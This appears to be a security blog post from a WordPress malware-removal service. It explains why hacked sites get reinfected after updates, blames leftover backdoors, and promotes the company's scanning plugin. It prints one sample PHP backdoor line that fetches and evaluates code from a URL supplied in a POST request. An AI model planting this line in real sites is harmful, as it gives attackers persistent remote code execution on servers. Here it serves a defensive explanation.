Since WordPress sites are the most commonly used cms (content management system) in the world, many hackers will target WordPress sites to use them as a springboard for various illicit activities.

Although it is extremely rare for a site to be actually tampered with, once a site has been tampered with, even after updating WordPress and plug-ins, the site can be tampered with or infected with malware (viruses) immediately.
Here are the reasons for this and how to deal with it.

WordPress is re-modified (re-infected) even after updating the main body (core files) and all plugins and themes.

Most WordPress hacks are due to vulnerabilities in WordPress plugins. (In our experience, more than 80% of the cases are due to vulnerabilities.)
Therefore, it is very effective to keep WordPress and its plug-ins up-to-date to prevent hacking.

However, if a site has already been tampered with and the vulnerability seems to be gone after the site is updated to the latest version of WordPress and plug-ins, but the site is tampered with again, it is often due to the fact that a backdoor, which is an entry point for hackers to hack into the site, is still in place. This is often due to the fact that a backdoor, or a point of entry for hackers, remains.

What is a backdoor?

A backdoor is a program that, for example
*In many cases, obfuscation is applied to make the program difficult to read.

eval(file_get_contents($_POST['malwaresiteurl']));

This program allows you to pass any URL from your browser to the server where this file is located, and any malicious program in that URL can be executed on that server.
This means that you can place any file you want (malware or virus) on the server, or even rewrite the contents of any file.

If these backdoors are parasitic on folders or files that are not affected by WordPress or plugin updates, they can remain on the server after an update and can be hacked over and over again.

How do I detect and remove backdoors?

If your WordPress site has been defaced, it is necessary to update WordPress itself and plugins to squash the vulnerability, but it is also important to detect and remove this backdoor.

Backdoors are nowadays often placed in very deep hierarchies, written into legitimate WordPress files, or hidden under confusing names, making it impractical to visually search for them among the thousands (sometimes tens of thousands) of files in the WordPress program.

WordPress Doctor has collected and produced this plugin based on the patterns we have found through our numerous malware removal operations,

Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].

This plugin can remove and delete malware files including backdoors.
If your site has been defaced, we recommend that you have it scanned.